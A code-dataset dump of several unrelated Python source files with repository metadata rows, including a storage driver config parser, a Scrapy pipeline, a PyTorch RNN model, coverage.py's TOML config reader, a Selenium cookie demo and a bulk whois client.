raise exception.InvalidInput(reason=msg)
pools = set(x.strip() for x in text.split(';') if x.strip())
if not pools:
msg = _('No valid storage pool configured.')
LOG.error(msg)
raise exception.InvalidInput(msg)
setattr(self.conf, 'storage_pools', list(pools))
def _force_delete_volume(self, xml_root):
force_delete_volume = False
text = xml_root.findtext('LUN/ForceDeleteVolume')
if text:
if text.lower().strip() in ('true', 'false'):
if text.lower().strip() == 'true':
force_delete_volume = True
else:
msg = _("ForceDeleteVolume configured error, "
"ForceDeleteVolume is %s.") % text
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
setattr(self.conf, 'force_delete_volume', force_delete_volume)
def _iscsi_info(self, xml_root):
iscsi_info = {}
text = xml_root.findtext('iSCSI/DefaultTargetIP')
if text:
iscsi_info['default_target_ips'] = [
ip.strip() for ip in text.split() if ip.strip()]
initiators = {}
nodes = xml_root.findall('iSCSI/Initiator')
for node in nodes or []:
if 'Name' in node.attrib:
initiators[node.attrib['Name']] = node.attrib
if 'HostName' in node.attrib:
initiators[node.attrib['HostName']] = node.attrib
if nodes and not initiators:
msg = _("Name or HostName must be set one")
LOG.error(msg)
raise exception.InvalidInput(msg)
iscsi_info['initiators'] = initiators
self._check_hostname_regex_config(iscsi_info)
setattr(self.conf, 'iscsi_info', iscsi_info)
def _fc_info(self, xml_root):
fc_info = {}
initiators = {}
nodes = xml_root.findall('FC/Initiator')
for node in nodes or []:
if 'Name' in node.attrib:
initiators[node.attrib['Name']] = node.attrib
if 'HostName' in node.attrib:
initiators[node.attrib['HostName']] = node.attrib
if nodes and not initiators:
msg = _("Name or HostName must be set one")
LOG.error(msg)
raise exception.InvalidInput(msg)
fc_info['initiators'] = initiators
self._check_hostname_regex_config(fc_info)
setattr(self.conf, 'fc_info', fc_info)
def _check_hostname_regex_config(self, info):
for item in info['initiators'].keys():
ini = info['initiators'][item]
if ini.get("HostName"):
try:
if ini.get("HostName") == '*':
continue
re.compile(ini['HostName'])
except Exception as err:
msg = _('Invalid initiator configuration. '
'Reason: %s.') % err
LOG.error(msg)
raise exception.InvalidInput(msg)
def _convert_one_iscsi_info(self, ini_text):
# get initiator configure attr list
attr_list = re.split('[{;}]', ini_text)
# get initiator configures
ini = {}
for attr in attr_list:
if not attr:
continue
pair = attr.split(':', 1)
if pair[0] == 'CHAPinfo':
value = pair[1].replace('#', ';', 1)
else:
value = pair[1]
ini[pair[0]] = value
if 'Name' not in ini and 'HostName' not in ini:
msg = _('Name or HostName must be specified for'
' initiator.')
LOG.error(msg)
raise exception.InvalidInput(msg)
return ini
def _parse_remote_initiator_info(self, dev, ini_type):
ini_info = {'default_target_ips': []}
if dev.get('iscsi_default_target_ip'):
ini_info['default_target_ips'] = dev[
'iscsi_default_target_ip'].split(';')
initiators = {}
if ini_type in dev:
# Analyze initiators configure text, convert to:
# [{'Name':'xxx'}, {'Name':'xxx','CHAPinfo':'mm-usr#mm-pwd'}]
ini_list = re.split('\n', dev[ini_type])
for text in ini_list:
ini = self._convert_one_iscsi_info(text.strip())
if 'Name' in ini:
initiators[ini['Name']] = ini
if 'HostName' in ini:
initiators[ini['HostName']] = ini
if ini_list and not initiators:
msg = _("Name or HostName must be set one")
LOG.error(msg)
raise exception.InvalidInput(msg)
ini_info['initiators'] = initiators
self._check_hostname_regex_config(ini_info)
return ini_info
def _hypermetro_devices(self, xml_root):
dev = self.conf.safe_get('hypermetro_device')
config = {}
if dev:
config = {
'san_address': dev['san_address'].split(';'),
'san_user': dev['san_user'],
'san_password': dev['san_password'],
'vstore_name': dev.get('vstore_name'),
'metro_domain': dev['metro_domain'],
'storage_pools': dev['storage_pool'].split(';')[:1],
'iscsi_info': self._parse_remote_initiator_info(
dev, 'iscsi_info'),
'fc_info': self._parse_remote_initiator_info(
dev, 'fc_info'),
'sync_speed': self.conf.hyper_sync_speed,
'metro_sync_completed': dev['metro_sync_completed']
if 'metro_sync_completed' in dev else "True"
}
setattr(self.conf, 'hypermetro', config)
def _replication_devices(self, xml_root):
replication_devs = self.conf.safe_get('replication_device')
config = {}
if replication_devs:
dev = replication_devs[0]
config = {
'backend_id': dev['backend_id'],
'san_address': dev['san_address'].split(';'),
'san_user': dev['san_user'],
'san_password': dev['san_password'],
'vstore_name': dev.get('vstore_name'),
'storage_pools': dev['storage_pool'].split(';')[:1],
'iscsi_info': self._parse_remote_initiator_info(
dev, 'iscsi_info'),
'fc_info': self._parse_remote_initiator_info(
dev, 'fc_info'),
'sync_speed': self.conf.replica_sync_speed,
}
setattr(self.conf, 'replication', config)
def _lun_copy_speed(self, xml_root):
text = xml_root.findtext('LUN/LUNCopySpeed')
if text and text.strip() not in constants.LUN_COPY_SPEED_TYPES:
msg = (_("Invalid LUNCopySpeed '%(text)s', LUNCopySpeed must "
"be between %(low)s and %(high)s.")
% {"text": text, "low": constants.LUN_COPY_SPEED_LOW,
"high": constants.LUN_COPY_SPEED_HIGHEST})
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
if not text:
speed = constants.LUN_COPY_SPEED_MEDIUM
else:
speed = text.strip()
setattr(self.conf, 'lun_copy_speed', int(speed))
def _lun_copy_mode(self, xml_root):
clone_mode = constants.DEFAULT_CLONE_MODE
text = xml_root.findtext('LUN/LUNCloneMode')
if text:
clone_mode = text.strip()
if clone_mode not in constants.SUPPORT_CLONE_MODE:
msg = _("%(array)s array requires %(valid)s lun type, "
"but %(conf)s is specified."
) % {'array': self.conf.san_product,
'valid': constants.SUPPORT_CLONE_MODE,
'conf': clone_mode}
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
setattr(self.conf, 'clone_mode', clone_mode)
def _hyper_pair_sync_speed(self, xml_root):
text = xml_root.findtext('LUN/HyperSyncSpeed')
if text and text.strip() not in constants.HYPER_SYNC_SPEED_TYPES:
msg = (_("Invalid HyperSyncSpeed '%(text)s', HyperSyncSpeed must "
"be between %(low)s and %(high)s.")
% {"text": text, "low": constants.HYPER_SYNC_SPEED_LOW,
"high": constants.HYPER_SYNC_SPEED_HIGHEST})
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
if not text:
speed = constants.HYPER_SYNC_SPEED_MEDIUM
else:
speed = text.strip()
setattr(self.conf, 'hyper_sync_speed', int(speed))
def _hyper_enforce_multipath(self, xml_root):
enforce_multipath_for_hypermetro = True
text = xml_root.findtext('LUN/HyperEnforceMultipath')
if text:
if text.lower().strip() in ('true', 'false'):
if text.lower().strip() == 'false':
enforce_multipath_for_hypermetro = False
else:
msg = _("HyperEnforceMultipath configured error, "
"HyperEnforceMultipath is %s.") % text
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
setattr(self.conf, 'enforce_multipath_for_hypermetro',
enforce_multipath_for_hypermetro)
def _replication_pair_sync_speed(self, xml_root):
text = xml_root.findtext('LUN/ReplicaSyncSpeed')
if text and text.strip() not in constants.HYPER_SYNC_SPEED_TYPES:
msg = (_("Invalid ReplicaSyncSpeed '%(text)s', ReplicaSyncSpeed "
"must be between %(low)s and %(high)s.")
% {"text": text, "low": constants.REPLICA_SYNC_SPEED_LOW,
"high": constants.REPLICA_SYNC_SPEED_HIGHEST})
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
if not text:
speed = constants.REPLICA_SYNC_SPEED_MEDIUM
else:
speed = text.strip()
setattr(self.conf, 'replica_sync_speed', int(speed))
def _lun_copy_wait_interval(self, xml_root):
text = xml_root.findtext('LUN/LUNcopyWaitInterval')
if text and not text.isdigit():
msg = (_("Invalid LUN_Copy_Wait_Interval '%s', "
"LUN_Copy_Wait_Interval must be a digit.")
% text)
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
interval = text.strip() if text else constants.DEFAULT_WAIT_INTERVAL
setattr(self.conf, 'lun_copy_wait_interval', int(interval))
def _lun_timeout(self, xml_root):
text = xml_root.findtext('LUN/Timeout')
if text and not text.isdigit():
msg = (_("Invalid LUN timeout '%s', LUN timeout must be a digit.")
% text)
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
interval = text.strip() if text else constants.DEFAULT_WAIT_TIMEOUT
setattr(self.conf, 'lun_timeout', int(interval))
def _get_minimum_fc_initiator(self, xml_root):
text = xml_root.findtext('FC/MinOnlineFCInitiator')
minimum_fc_initiator = constants.DEFAULT_MINIMUM_FC_INITIATOR_ONLINE
if text and not text.isdigit():
msg = (_("Invalid FC MinOnlineFCInitiator '%s', "
"MinOnlineFCInitiator must be a digit.") % text)
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
if text and text.strip() and text.strip().isdigit():
try:
minimum_fc_initiator = int(text.strip())
except Exception as err:
msg = (_("Minimum FC initiator number %(num)s is set"
" too large, reason is %(err)s")
% {"num": text.strip(), "err": err})
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
setattr(self.conf, 'min_fc_ini_online',
minimum_fc_initiator)
def _rollback_speed(self, xml_root):
text = xml_root.findtext('LUN/SnapshotRollbackSpeed')
if text and text.strip() not in constants.SNAPSHOT_ROLLBACK_SPEED_TYPES:
msg = (_("Invalid SnapshotRollbackSpeed '%(text)s', "
"SnapshotRollbackSpeed must "
"be between %(low)s and %(high)s.")
% {"text": text,
"low": constants.SNAPSHOT_ROLLBACK_SPEED_LOW,
"high": constants.SNAPSHOT_ROLLBACK_SPEED_HIGHEST})
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
if not text:
speed = constants.SNAPSHOT_ROLLBACK_SPEED_HIGH
else:
speed = text.strip()
setattr(self.conf, 'rollback_speed', int(speed))
| 38.910053 | 80 | 0.573339 |
4a1e31a3749acfbe9a253cef39f3e601664ff42c | 896 | py | Python | WikiScraper/WikiScraper/pipelines.py | TobiOnabolu/WebScrapers | 1ff55e6c756303f265917274c16638af4cde5d05 | [
"MIT"
] | null | null | null | WikiScraper/WikiScraper/pipelines.py | TobiOnabolu/WebScrapers | 1ff55e6c756303f265917274c16638af4cde5d05 | [
"MIT"
] | null | null | null | WikiScraper/WikiScraper/pipelines.py | TobiOnabolu/WebScrapers | 1ff55e6c756303f265917274c16638af4cde5d05 | [
"MIT"
] | null | null | null | # Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
from itemadapter import ItemAdapter
from scrapy.exceptions import DropItem
# Pipelines used for cleaning your item data records after scraping.
# This makes it easier than doing separate cleaning for each crawler.
class WikiscraperPipeline:
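    """Validate scraped items: drop any item that is missing one of the
    required fields (lastupdated, url, name, league)."""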
    def process_item(self, item, spider):
        # spider.logger.info('A response just arrived!')
        # drop the item if one of the required fields is missing
        if not item['lastupdated'] or not item['url'] or not item['name'] or not item['league']:
            raise DropItem("Missing Field")  # from scrapy, used to drop a record
        return item
# Have separate pipeline classes for each specific thing you want to do.
| 35.84 | 96 | 0.741071 |
4a1e321d24f9266ba328c1020e565d9f0c014761 | 5,446 | py | Python | model.py | Adversarial-dropout-rnn/adversarial_dropout_lm | e08ff9aa51765fff6cfac4c2576e58bee3fcd173 | [
"BSD-3-Clause"
] | null | null | null | model.py | Adversarial-dropout-rnn/adversarial_dropout_lm | e08ff9aa51765fff6cfac4c2576e58bee3fcd173 | [
"BSD-3-Clause"
] | null | null | null | model.py | Adversarial-dropout-rnn/adversarial_dropout_lm | e08ff9aa51765fff6cfac4c2576e58bee3fcd173 | [
"BSD-3-Clause"
] | null | null | null |
import torch
import torch.nn as nn
from torch.autograd import Variable
from embed_regularize import embedded_dropout_mask
from locked_dropout import LockedDropoutMask
from weight_drop import WeightDropMask
from pytorch_LSTM import LSTM, LSTMCell, BNLSTMCell
class RNNModel(nn.Module):
"""Container module with an encoder, a recurrent module, and a decoder."""
def __init__(self, rnn_type, ntoken, ninp, nhid, nlayers, dropout=0.5, dropouth=0.5, dropouti=0.5, dropoute=0.1, wdrop=0, tie_weights=False):
super(RNNModel, self).__init__()
self.lockdrop = LockedDropoutMask()
self.idrop = nn.Dropout(dropouti)
self.hdrop = nn.Dropout(dropouth)
self.drop = nn.Dropout(dropout)
self.encoder = nn.Embedding(ntoken, ninp)
assert rnn_type in ['LSTM', 'QRNN'], 'RNN type is not supported'
if rnn_type == 'LSTM':
#self.rnns = [torch.nn.LSTM(ninp if l == 0 else nhid, nhid if l != nlayers - 1 else ninp, 1, dropout=0) if l != nlayers-1
# else LSTM(LSTMCell, ninp if l == 0 else nhid, nhid if l != nlayers - 1 else ninp, num_layers=1, dropout=0) for l in range(nlayers)]
self.rnns = [torch.nn.LSTM(ninp if l == 0 else nhid, nhid if l != nlayers - 1 else ninp, 1, dropout=0) for l in range(nlayers)]
if wdrop:
self.rnns = [WeightDropMask(self.rnns[l], ['weight_hh_l0'], dropout=wdrop) for l in range(nlayers)]
elif rnn_type == 'QRNN':
from torchqrnn import QRNNLayer
self.rnns = [QRNNLayer(input_size=ninp if l == 0 else nhid, hidden_size=nhid if l != nlayers - 1 else ninp, save_prev_x=True, zoneout=0, window=2 if l == 0 else 1, output_gate=True) for l in range(nlayers)]
for rnn in self.rnns:
rnn.linear = WeightDropMask(rnn.linear, ['weight'], dropout=wdrop)
print(self.rnns)
self.rnns = torch.nn.ModuleList(self.rnns)
self.decoder = nn.Linear(nhid, ntoken)
# Optionally tie weights as in:
# "Using the Output Embedding to Improve Language Models" (Press & Wolf 2016)
# https://arxiv.org/abs/1608.05859
# and
# "Tying Word Vectors and Word Classifiers: A Loss Framework for Language Modeling" (Inan et al. 2016)
# https://arxiv.org/abs/1611.01462
if tie_weights:
#if nhid != ninp:
# raise ValueError('When using the tied flag, nhid must be equal to emsize')
self.decoder.weight = self.encoder.weight
self.init_weights()
self.rnn_type = rnn_type
self.ninp = ninp
self.nhid = nhid
self.nlayers = nlayers
self.dropout = dropout
self.dropouti = dropouti
self.dropouth = dropouth
self.dropoute = dropoute
def reset(self):
if self.rnn_type == 'QRNN': [r.reset() for r in self.rnns]
def init_weights(self):
initrange = 0.1
self.encoder.weight.data.uniform_(-initrange, initrange)
self.decoder.bias.data.fill_(0)
self.decoder.weight.data.uniform_(-initrange, initrange)
def forward(self, input, hidden, return_h=False, maske=None, maski=None, maskh=None, maskw=None, masko=None):
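        """Forward pass: embedding lookup, the stack of (weight-dropped) RNNs,
        then the linear decoder.

        The mask* arguments are externally supplied dropout masks (embedding,
        input, per-layer hidden, recurrent weights, output); when left as None
        the *Mask helpers presumably fall back to the configured dropout rates.
        """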
emb = embedded_dropout_mask(self.encoder, input, maske, dropout=self.dropoute, training=self.training)
emb = self.lockdrop(emb, maski, self.dropouti)
raw_output = emb
new_hidden = []
raw_outputs = []
outputs = []
if maskh is None: maskh = [None for l in range(0, self.nlayers - 1)]
if maskw is None: maskw = [None for l in range(0, self.nlayers)]
for l, rnn in enumerate(self.rnns):
current_input = raw_output
#print(l)
#print(rnn)
raw_output, new_h = rnn(maskw[l], raw_output, hidden[l])
new_hidden.append(new_h)
raw_outputs.append(raw_output)
if l != self.nlayers - 1:
#self.hdrop(raw_output)
raw_output = self.lockdrop(raw_output, maskh[l], self.dropouth)
outputs.append(raw_output)
hidden = new_hidden
output = self.lockdrop(raw_output, masko, self.dropout)
outputs.append(output)
decoded = self.decoder(output.view(output.size(0)*output.size(1), output.size(2)))
result = decoded.view(output.size(0), output.size(1), decoded.size(1))
if return_h:
return result, hidden, raw_outputs, outputs
return result, hidden
def zero_grads(self):
"""Sets gradients of all model parameters to zero."""
for p in self.parameters():
if p.grad is not None:
p.grad.data.zero_()
def init_hidden(self, bsz):
weight = next(self.parameters()).data
if self.rnn_type == 'LSTM':
return [(Variable(weight.new(1, bsz, self.nhid if l != self.nlayers - 1 else self.ninp).zero_()),
Variable(weight.new(1, bsz, self.nhid if l != self.nlayers - 1 else self.ninp).zero_()))
for l in range(self.nlayers)]
elif self.rnn_type == 'QRNN':
return [Variable(weight.new(1, bsz, self.nhid if l != self.nlayers - 1 else self.ninp).zero_())
for l in range(self.nlayers)]
| 46.547009 | 219 | 0.598972 |
4a1e322073ecd5b9ab934106b3ebd6678898f2f9 | 2,685 | py | Python | mlbapi/data/league.py | trevor-viljoen/mlbapi | f674e6ee0cf4d148e491ebac60382f2461ec4397 | [
"MIT"
] | 9 | 2020-02-25T15:51:00.000Z | 2021-12-30T05:22:06.000Z | mlbapi/data/league.py | trevor-viljoen/mlbapi | f674e6ee0cf4d148e491ebac60382f2461ec4397 | [
"MIT"
] | 1 | 2020-07-26T16:00:48.000Z | 2020-07-26T16:05:00.000Z | mlbapi/data/league.py | trevor-viljoen/mlbapi | f674e6ee0cf4d148e491ebac60382f2461ec4397 | [
"MIT"
] | 1 | 2021-02-21T17:29:48.000Z | 2021-02-21T17:29:48.000Z |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""mlbapi functions for the league API endpoints.
This module's functions get the JSON payloads for the mlb.com games API
endpoints.
.. _Google Python Style Guide:
http://google.github.io/styleguide/pyguide.html
"""
from mlbapi.data import request
from mlbapi import endpoint
def get_league(league_id, **kwargs):
"""This endpoint allows you to pull the information for a league.
Args:
league_id (int): Unique League Identifier
params (dict): Contains the league_ids, season, seasons, expand, and
fields parameters described below.
params:
league_id (required)
Description: Unique League Identifier
Parameter Type: path
Data Type: integer
league_ids
Description: Comma delimited list of League IDs.
Format: 1234, 2345
Parameter Type: query
Data Type: array[integer]
season
Description: Season of play
Parameter Type: query
Data Type: string
seasons
Description: Seasons of play
Parameter Type: query
Data Type: array[string]
expand
Description: ?
Parameter type: query
Data Type: array[string]
fields
Description: Comma delimited list of specific fields to be returned.
Format: topLevelNode, childNode, attribute
Parameter Type: query
Data Type: array[string]
Returns:
json
"""
return request(endpoint.LEAGUE, primary_key=league_id, **kwargs)
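# Illustrative call only: the league id and season below are made up, and the
# params dict follows the docstring above rather than a confirmed signature.
# get_league(103, params={"season": "2021"})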
def get_league_all_stars(league_id, write_ins=False, **kwargs):
"""This endpoint allows you to pull the all star ballots for a given league.
Args:
league_id (int): Unique League Identifier
params (dict): Contains the group, and fields parameters described
below.
params:
league_id (required)
            Description: Unique League Identifier
Parameter Type: path
Data Type: integer
league_ids
Description: Comma delimited list of League IDs.
Format: 1234, 2345
Parameter Type: query
Data Type: array[integer]
season
Description: Season of play
Parameter Type: query
Data Type: string
fields
Description: Comma delimited list of specific fields to be returned.
Format: topLevelNode, childNode, attribute
Parameter Type: query
Data Type: array[string]
Returns:
json
"""
if write_ins:
context = 'allStarWriteIns'
else:
context = 'allStarFinalVote'
return request(endpoint.LEAGUE, context, primary_key=league_id, **kwargs)
| 29.505495 | 80 | 0.649534 |
4a1e322c5fdd41b58eb5449d8251c9bf556a1966 | 5,733 | py | Python | coverage/tomlconfig.py | timofurrer/coveragepy | 72e9761ee79eb2f5b61b21a5427e07fff6acd400 | [
"Apache-2.0"
] | 2,254 | 2015-01-05T01:28:03.000Z | 2022-03-29T10:37:10.000Z | coverage/tomlconfig.py | mgorny/coveragepy | 73ca4596fc8eed9c76714e7a5c80dd61d71fe1b1 | [
"Apache-2.0"
] | 707 | 2015-02-07T01:32:02.000Z | 2022-03-31T18:00:14.000Z | coverage/tomlconfig.py | sitedata/coveragepy | e4f0f9ee71a1ade66b51ec53d0061f462e3838cb | [
"Apache-2.0"
] | 439 | 2015-01-16T15:06:08.000Z | 2022-03-30T06:19:12.000Z |
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt
"""TOML configuration support for coverage.py"""
import configparser
import os
import re
from coverage.exceptions import CoverageException
from coverage.misc import import_third_party, substitute_variables
# TOML support is an install-time extra option. (Import typing is here because
# import_third_party will unload any module that wasn't already imported.
# tomli imports typing, and if we unload it, later it's imported again, and on
# Python 3.6, this causes infinite recursion.)
import typing # pylint: disable=unused-import, wrong-import-order
tomli = import_third_party("tomli")
class TomlDecodeError(Exception):
"""An exception class that exists even when toml isn't installed."""
pass
class TomlConfigParser:
"""TOML file reading with the interface of HandyConfigParser."""
# This class has the same interface as config.HandyConfigParser, no
# need for docstrings.
# pylint: disable=missing-function-docstring
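    # For reference, this class reads coverage settings from TOML tables under
    # the "tool.coverage." prefix, e.g. (illustrative):
    #
    #   [tool.coverage.run]
    #   branch = true
    #
    # When our_file is true, the same section names are also accepted without
    # the prefix.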
def __init__(self, our_file):
self.our_file = our_file
self.data = None
def read(self, filenames):
# RawConfigParser takes a filename or list of filenames, but we only
# ever call this with a single filename.
assert isinstance(filenames, (bytes, str, os.PathLike))
filename = os.fspath(filenames)
try:
with open(filename, encoding='utf-8') as fp:
toml_text = fp.read()
except OSError:
return []
if tomli is not None:
toml_text = substitute_variables(toml_text, os.environ)
try:
self.data = tomli.loads(toml_text)
except tomli.TOMLDecodeError as err:
raise TomlDecodeError(str(err)) from err
return [filename]
else:
has_toml = re.search(r"^\[tool\.coverage\.", toml_text, flags=re.MULTILINE)
if self.our_file or has_toml:
# Looks like they meant to read TOML, but we can't read it.
msg = "Can't read {!r} without TOML support. Install with [toml] extra"
raise CoverageException(msg.format(filename))
return []
def _get_section(self, section):
"""Get a section from the data.
Arguments:
section (str): A section name, which can be dotted.
Returns:
name (str): the actual name of the section that was found, if any,
or None.
data (str): the dict of data in the section, or None if not found.
"""
prefixes = ["tool.coverage."]
if self.our_file:
prefixes.append("")
for prefix in prefixes:
real_section = prefix + section
parts = real_section.split(".")
try:
data = self.data[parts[0]]
for part in parts[1:]:
data = data[part]
except KeyError:
continue
break
else:
return None, None
return real_section, data
def _get(self, section, option):
"""Like .get, but returns the real section name and the value."""
name, data = self._get_section(section)
if data is None:
raise configparser.NoSectionError(section)
try:
return name, data[option]
except KeyError as exc:
raise configparser.NoOptionError(option, name) from exc
def has_option(self, section, option):
_, data = self._get_section(section)
if data is None:
return False
return option in data
def has_section(self, section):
name, _ = self._get_section(section)
return name
def options(self, section):
_, data = self._get_section(section)
if data is None:
raise configparser.NoSectionError(section)
return list(data.keys())
def get_section(self, section):
_, data = self._get_section(section)
return data
def get(self, section, option):
_, value = self._get(section, option)
return value
def _check_type(self, section, option, value, type_, type_desc):
if not isinstance(value, type_):
raise ValueError(
'Option {!r} in section {!r} is not {}: {!r}'
.format(option, section, type_desc, value)
)
def getboolean(self, section, option):
name, value = self._get(section, option)
self._check_type(name, option, value, bool, "a boolean")
return value
def getlist(self, section, option):
name, values = self._get(section, option)
self._check_type(name, option, values, list, "a list")
return values
def getregexlist(self, section, option):
name, values = self._get(section, option)
self._check_type(name, option, values, list, "a list")
for value in values:
value = value.strip()
try:
re.compile(value)
except re.error as e:
raise CoverageException(f"Invalid [{name}].{option} value {value!r}: {e}") from e
return values
def getint(self, section, option):
name, value = self._get(section, option)
self._check_type(name, option, value, int, "an integer")
return value
def getfloat(self, section, option):
name, value = self._get(section, option)
if isinstance(value, int):
value = float(value)
self._check_type(name, option, value, float, "a float")
return value
| 34.745455 | 97 | 0.60771 |
4a1e3262e21baf5ae4bb27052fd91b8c3a2f70e8 | 1,943 | py | Python | profiles/constants.py | mitodl/bootcamp-ecommerce | ba7d6aefe56c6481ae2a5afc84cdd644538b6d50 | [
"BSD-3-Clause"
] | 2 | 2018-06-20T19:37:03.000Z | 2021-01-06T09:51:40.000Z | profiles/constants.py | mitodl/bootcamp-ecommerce | ba7d6aefe56c6481ae2a5afc84cdd644538b6d50 | [
"BSD-3-Clause"
] | 1,226 | 2017-02-23T14:52:28.000Z | 2022-03-29T13:19:54.000Z | profiles/constants.py | mitodl/bootcamp-ecommerce | ba7d6aefe56c6481ae2a5afc84cdd644538b6d50 | [
"BSD-3-Clause"
] | 3 | 2017-03-20T03:51:27.000Z | 2021-03-19T15:54:31.000Z |
"""User constants"""
import pycountry
USERNAME_MAX_LEN = 30
# Defined in edX Profile model
MALE = "m"
FEMALE = "f"
OTHER = "o"
GENDER_CHOICES = (
(MALE, "Male"),
(FEMALE, "Female"),
(OTHER, "Other/Prefer Not to Say"),
)
COMPANY_SIZE_CHOICES = (
(None, "----"),
(1, "Small/Start-up (1+ employees)"),
(9, "Small/Home office (1-9 employees)"),
(99, "Small (10-99 employees)"),
(999, "Small to medium-sized (100-999 employees)"),
(9999, "Medium-sized (1000-9999 employees)"),
(10000, "Large Enterprise (10,000+ employees)"),
(0, "Other (N/A or Don't know)"),
)
YRS_EXPERIENCE_CHOICES = (
(None, "----"),
(2, "Less than 2 years"),
(5, "2-5 years"),
(10, "6 - 10 years"),
(15, "11 - 15 years"),
(20, "16 - 20 years"),
(21, "More than 20 years"),
(0, "Prefer not to say"),
)
HIGHEST_EDUCATION_CHOICES = (
(None, "----"),
("Doctorate", "Doctorate"),
("Master's or professional degree", "Master's or professional degree"),
("Bachelor's degree", "Bachelor's degree"),
("Associate degree", "Associate degree"),
("Secondary/high school", "Secondary/high school"),
(
"Junior secondary/junior high/middle school",
"Junior secondary/junior high/middle school",
),
("Elementary/primary school", "Elementary/primary school"),
("No formal education", "No formal education"),
("Other education", "Other education"),
)
COUNTRIES_REQUIRING_POSTAL_CODE = (
pycountry.countries.get(alpha_2="US"),
pycountry.countries.get(alpha_2="CA"),
)
ALUM_LEARNER_EMAIL = "Learner Email"
ALUM_BOOTCAMP_NAME = "Bootcamp Name"
ALUM_BOOTCAMP_RUN_TITLE = "Bootcamp Run Title"
ALUM_BOOTCAMP_START_DATE = "Bootcamp Start Date"
ALUM_BOOTCAMP_END_DATE = "Bootcamp End Date"
ALUM_HEADER_FIELDS = [
ALUM_LEARNER_EMAIL,
ALUM_BOOTCAMP_NAME,
ALUM_BOOTCAMP_RUN_TITLE,
ALUM_BOOTCAMP_START_DATE,
ALUM_BOOTCAMP_END_DATE,
]
| 26.616438 | 75 | 0.640762 |
4a1e3290c3678e81940752e2311113d781615683 | 179 | py | Python | concrete/common/values/__init__.py | iciac/concrete-numpy | debf888e9281263b731cfc4b31feb5de7ec7f47a | [
"FTL"
] | 96 | 2022-01-12T15:07:50.000Z | 2022-03-16T04:00:09.000Z | concrete/common/values/__init__.py | iciac/concrete-numpy | debf888e9281263b731cfc4b31feb5de7ec7f47a | [
"FTL"
] | 10 | 2022-02-04T16:26:37.000Z | 2022-03-25T14:08:01.000Z | concrete/common/values/__init__.py | iciac/concrete-numpy | debf888e9281263b731cfc4b31feb5de7ec7f47a | [
"FTL"
] | 8 | 2022-01-12T15:07:55.000Z | 2022-03-05T00:46:16.000Z |
"""Module for value structures."""
from . import tensors
from .base import BaseValue
from .tensors import ClearScalar, ClearTensor, EncryptedScalar, EncryptedTensor, TensorValue
| 29.833333 | 92 | 0.804469 |
4a1e3357d3d11268d8d321aa700bf68d47d3e163 | 366 | py | Python | python-spider/selenium-demo/cookies_demo.py | meteor1993/python-learning | 4ee574c9360caf6e63bb6ee2ef31fa6a9918fa40 | [
"MIT"
] | 83 | 2019-10-15T06:54:06.000Z | 2022-03-28T14:08:21.000Z | python-spider/selenium-demo/cookies_demo.py | wenxuefeng3930/python-learning | 4ee574c9360caf6e63bb6ee2ef31fa6a9918fa40 | [
"MIT"
] | 1 | 2020-04-16T08:13:19.000Z | 2020-07-14T01:52:46.000Z | python-spider/selenium-demo/cookies_demo.py | wenxuefeng3930/python-learning | 4ee574c9360caf6e63bb6ee2ef31fa6a9918fa40 | [
"MIT"
] | 74 | 2019-11-02T08:10:36.000Z | 2022-02-19T12:23:36.000Z |
from selenium import webdriver
browser = webdriver.Chrome()
browser.get('https://www.geekdigging.com/')
# Get the current cookies
print(browser.get_cookies())
# Add a cookie
browser.add_cookie({'name': 'name', 'domain': 'www.geekdigging.com', 'value': 'geekdigging'})
print(browser.get_cookies())
# Delete all cookies
browser.delete_all_cookies()
print(browser.get_cookies())
| 30.5 | 94 | 0.73224 |
4a1e33b5fe9f89c1d74c47c4ab205543493541df | 6,228 | py | Python | deb_dist/bulkwhois-0.2.1/debian/python-bulkwhois/usr/share/pyshared/bulkwhois/__init__.py | csirtfoundry/BulkWhois | b0ac5ae340d582fed67e75214350cf2702529c5a | [
"MIT"
] | 5 | 2017-05-13T22:51:01.000Z | 2020-12-13T14:01:17.000Z | deb_dist/bulkwhois-0.2.1/build/lib.linux-x86_64-2.6/bulkwhois/__init__.py | csirtfoundry/BulkWhois | b0ac5ae340d582fed67e75214350cf2702529c5a | [
"MIT"
] | 1 | 2020-02-26T10:27:12.000Z | 2020-02-26T10:27:12.000Z | deb_dist/bulkwhois-0.2.1/debian/python-bulkwhois/usr/share/pyshared/bulkwhois/__init__.py | csirtfoundry/BulkWhois | b0ac5ae340d582fed67e75214350cf2702529c5a | [
"MIT"
] | 3 | 2017-07-07T15:59:20.000Z | 2022-01-23T11:09:11.000Z |
__all__ = ('BulkWhois',)
import telnetlib
import socket
import logging
class BulkWhois(object):
"""
Query a list of IP addresses from a bulk whois server. This is an
efficient way to query a large number of IP addresses. It sends all
the IP addresses at once, and receives all whois results together.
This module takes the approach that you know what you're doing: if
you have non-IP data in there (such as hostnames), the whois server
will ignore them and they won't be included in results.
This class is not designed to be called directly: rather, use one of
the subclass interfaces to specific bulk whois servers such as
bulkwhois.cymru or bulkwhois.shadowserver, which are set to appropriate
default settings for those services.
Usage:
        from bulkwhois import BulkWhois
        bw = BulkWhois()
        records = bw.lookup_ips(["192.168.0.1", "10.1.1.1"])
Args:
leader: Any text that needs to appear before the bulk whois query
footer: Any text that needs to appear after the bulk whois query
server: the hostname of the whois server to use
port: the whois server port number to connect to
        record_delim: the char to split records received from the whois server
field_delim: the char to split individual fields in each record
has_results_header: set to True if the whois server send a header
line in the results which has no whois data
fields: a list defining the order of the names of the fields
returned by the server. Used to populate the dict returned.
"""
leader = ""
footer = ""
server = ""
port = -1
record_delim = ""
field_delim = ""
has_result_header = False
field_names = []
def __init__(self,
leader="begin",
footer="end",
server="asn.shadowserver.org",
port="43",
record_delim="\n",
field_delim="|",
has_result_header=False):
